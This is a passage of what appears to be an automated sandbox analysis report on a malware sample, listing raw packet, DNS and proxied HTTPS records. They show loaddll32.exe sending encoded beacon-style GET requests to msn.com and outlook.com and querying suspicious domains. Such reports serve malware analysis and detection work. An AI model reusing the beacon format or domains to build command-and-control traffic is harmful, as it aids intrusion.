Oct 11, 2021 22:51:07.066915035 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.066991091 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.067071915 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.067372084 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.067388058 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.067486048 CEST	49785	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.067492962 CEST	443	49785	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.096896887 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.096926928 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.097018957 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.097615957 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.097629070 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.169291019 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.169390917 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.171653986 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.171675920 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.172300100 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.174639940 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.195985079 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.196054935 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.196113110 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.197937012 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.197966099 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.197977066 CEST	49786	443	192.168.2.5	52.98.152.242
Oct 11, 2021 22:51:07.197985888 CEST	443	49786	52.98.152.242	192.168.2.5
Oct 11, 2021 22:51:07.219775915 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.219815969 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.219933033 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.220530987 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.220550060 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.235893965 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.235935926 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.236211061 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.236603975 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.236620903 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.318660975 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.319047928 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.321105003 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.321119070 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.321414948 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.323396921 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.360156059 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.360233068 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.360301018 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.360649109 CEST	49787	443	192.168.2.5	52.97.137.242
Oct 11, 2021 22:51:07.360671043 CEST	443	49787	52.97.137.242	192.168.2.5
Oct 11, 2021 22:51:07.745934010 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.746094942 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.748023987 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.748044968 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.748339891 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.750516891 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.791134119 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.922250032 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.922316074 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.922529936 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.922699928 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.922722101 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.922821999 CEST	49788	443	192.168.2.5	40.97.161.50
Oct 11, 2021 22:51:07.922868013 CEST	443	49788	40.97.161.50	192.168.2.5
Oct 11, 2021 22:51:07.948780060 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:07.948817968 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:07.949882984 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:07.966140985 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:07.966166973 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.064327955 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.064502001 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:08.067702055 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:08.067719936 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.068131924 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.071173906 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:08.099874020 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.099956036 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.100112915 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:08.100312948 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:08.100336075 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.100404024 CEST	49789	443	192.168.2.5	52.98.208.66
Oct 11, 2021 22:51:08.100416899 CEST	443	49789	52.98.208.66	192.168.2.5
Oct 11, 2021 22:51:08.128979921 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.129046917 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.129160881 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.130208969 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.130238056 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.225389004 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.225550890 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.229577065 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.229600906 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.230030060 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.232383013 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.264256001 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.264391899 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.265769958 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.266781092 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.266801119 CEST	443	49790	40.101.9.178	192.168.2.5
Oct 11, 2021 22:51:08.266948938 CEST	49790	443	192.168.2.5	40.101.9.178
Oct 11, 2021 22:51:08.266956091 CEST	443	49790	40.101.9.178	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2021 22:50:22.437870979 CEST	52441	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:50:22.459774971 CEST	53	52441	8.8.8.8	192.168.2.5
Oct 11, 2021 22:50:22.550457001 CEST	62176	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:50:22.569350004 CEST	53	62176	8.8.8.8	192.168.2.5
Oct 11, 2021 22:50:23.889962912 CEST	59596	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:50:24.435796976 CEST	65296	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:50:46.273989916 CEST	60075	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:50:46.295051098 CEST	53	60075	8.8.8.8	192.168.2.5
Oct 11, 2021 22:50:46.829330921 CEST	55016	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:50:46.849863052 CEST	53	55016	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:06.345551968 CEST	50394	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:06.363910913 CEST	53	50394	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:07.075432062 CEST	58530	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:07.095448971 CEST	53	58530	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:07.202419996 CEST	53813	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:07.216661930 CEST	63732	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:07.218367100 CEST	53	53813	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:07.234621048 CEST	53	63732	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:07.927795887 CEST	57344	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:07.945739031 CEST	53	57344	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:08.106379986 CEST	54450	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:08.124209881 CEST	53	54450	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:27.478935003 CEST	60516	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:27.497742891 CEST	53	60516	8.8.8.8	192.168.2.5
Oct 11, 2021 22:51:28.616483927 CEST	51649	53	192.168.2.5	8.8.8.8
Oct 11, 2021 22:51:28.635253906 CEST	53	51649	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 11, 2021 22:50:22.437870979 CEST	192.168.2.5	8.8.8.8	0x9bac	Standard query (0)	msn.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:22.550457001 CEST	192.168.2.5	8.8.8.8	0xdaf	Standard query (0)	msn.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:23.889962912 CEST	192.168.2.5	8.8.8.8	0xdaf9	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:24.435796976 CEST	192.168.2.5	8.8.8.8	0xfbd4	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:46.273989916 CEST	192.168.2.5	8.8.8.8	0x61bd	Standard query (0)	breuranel.website	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:46.829330921 CEST	192.168.2.5	8.8.8.8	0x427a	Standard query (0)	breuranel.website	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.345551968 CEST	192.168.2.5	8.8.8.8	0xdfb3	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.075432062 CEST	192.168.2.5	8.8.8.8	0xdf9c	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.202419996 CEST	192.168.2.5	8.8.8.8	0x348e	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.216661930 CEST	192.168.2.5	8.8.8.8	0x62a1	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.927795887 CEST	192.168.2.5	8.8.8.8	0xd20a	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:08.106379986 CEST	192.168.2.5	8.8.8.8	0x3597	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:27.478935003 CEST	192.168.2.5	8.8.8.8	0x5457	Standard query (0)	areuranel.website	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:28.616483927 CEST	192.168.2.5	8.8.8.8	0xa4f3	Standard query (0)	areuranel.website	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 11, 2021 22:50:22.459774971 CEST	8.8.8.8	192.168.2.5	0x9bac	No error (0)	msn.com		13.82.28.61	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:22.569350004 CEST	8.8.8.8	192.168.2.5	0xdaf	No error (0)	msn.com		13.82.28.61	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:23.907807112 CEST	8.8.8.8	192.168.2.5	0xdaf9	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:50:24.454166889 CEST	8.8.8.8	192.168.2.5	0xfbd4	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:50:46.295051098 CEST	8.8.8.8	192.168.2.5	0x61bd	Name error (3)	breuranel.website	none	none	A (IP address)	IN (0x0001)
Oct 11, 2021 22:50:46.849863052 CEST	8.8.8.8	192.168.2.5	0x427a	Name error (3)	breuranel.website	none	none	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:06.363910913 CEST	8.8.8.8	192.168.2.5	0xdfb3	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	HHN-efz.ms-acdc.office.com		52.98.152.242	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	HHN-efz.ms-acdc.office.com		52.98.207.210	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	HHN-efz.ms-acdc.office.com		52.98.208.66	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.095448971 CEST	8.8.8.8	192.168.2.5	0xdf9c	No error (0)	HHN-efz.ms-acdc.office.com		40.101.8.162	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST	8.8.8.8	192.168.2.5	0x348e	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST	8.8.8.8	192.168.2.5	0x348e	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST	8.8.8.8	192.168.2.5	0x348e	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST	8.8.8.8	192.168.2.5	0x348e	No error (0)	FRA-efz.ms-acdc.office.com		52.97.137.242	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST	8.8.8.8	192.168.2.5	0x348e	No error (0)	FRA-efz.ms-acdc.office.com		52.98.208.34	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.218367100 CEST	8.8.8.8	192.168.2.5	0x348e	No error (0)	FRA-efz.ms-acdc.office.com		40.101.124.18	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.234621048 CEST	8.8.8.8	192.168.2.5	0x62a1	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	FRA-efz.ms-acdc.office.com		52.98.208.66	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	FRA-efz.ms-acdc.office.com		52.97.157.162	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:07.945739031 CEST	8.8.8.8	192.168.2.5	0xd20a	No error (0)	FRA-efz.ms-acdc.office.com		52.97.212.34	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	HHN-efz.ms-acdc.office.com		40.101.9.178	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	HHN-efz.ms-acdc.office.com		52.97.151.66	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	HHN-efz.ms-acdc.office.com		52.97.151.98	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:08.124209881 CEST	8.8.8.8	192.168.2.5	0x3597	No error (0)	HHN-efz.ms-acdc.office.com		52.97.147.2	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:27.497742891 CEST	8.8.8.8	192.168.2.5	0x5457	Name error (3)	areuranel.website	none	none	A (IP address)	IN (0x0001)
Oct 11, 2021 22:51:28.635253906 CEST	8.8.8.8	192.168.2.5	0xa4f3	Name error (3)	areuranel.website	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

msn.com

outlook.com

www.outlook.com

outlook.office365.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49765	13.82.28.61	443	C:\Windows\System32\loaddll32.exe

Timestamp	Direction	Data
2021-10-11 20:50:23 UTC	OUT	GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: msn.com
2021-10-11 20:50:23 UTC	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.msn.com/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Mon, 11 Oct 2021 20:50:23 GMT Connection: close Content-Length: 374
2021-10-11 20:50:23 UTC	IN	Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 6a 58 54 76 52 55 33 37 58 2f 6b 4b 41 4e 36 32 75 42 64 33 74 44 54 34 55 75 76 58 66 37 2f 74 76 32 70 61 36 35 30 71 5f 32 42 4e 63 34 67 5a 78 5f 2f 32 46 54 58 65 4b 48 33 47 44 79 44 71 75 66 7a 5a 61 6b 66 76 4b 2f 5f 32 42 43 4e 58 61 6c 6c 6f 6f 71 37 2f 56 4f 44 4d 6b 6d 4e 46 2f 48 4c 68 4c 71 38 4d 4f 4b 63 77 69 76 55 4d 4d 78 4d 67 Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMg

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49766	13.82.28.61	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-11 20:50:23 UTC	1	OUT	GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: msn.com
2021-10-11 20:50:24 UTC	1	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.msn.com/mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Mon, 11 Oct 2021 20:50:23 GMT Connection: close Content-Length: 402
2021-10-11 20:50:24 UTC	2	IN	Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 52 53 54 4f 6b 4a 43 42 48 63 51 54 6c 58 33 37 32 6b 56 55 2f 58 62 45 54 35 33 32 55 75 6b 71 33 79 78 50 66 65 67 41 2f 72 4b 38 6a 67 5f 32 46 59 66 49 69 4e 45 31 53 6e 5f 32 46 46 43 2f 54 7a 42 33 67 42 63 32 32 4e 54 38 57 2f 53 45 70 43 61 59 42 68 2f 4e 7a 5f 32 46 66 5a 52 45 63 47 5f 32 42 4c 67 4d 7a 30 41 6d 5a 77 2f 48 65 66 30 43 Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0C

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49785	40.97.161.50	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
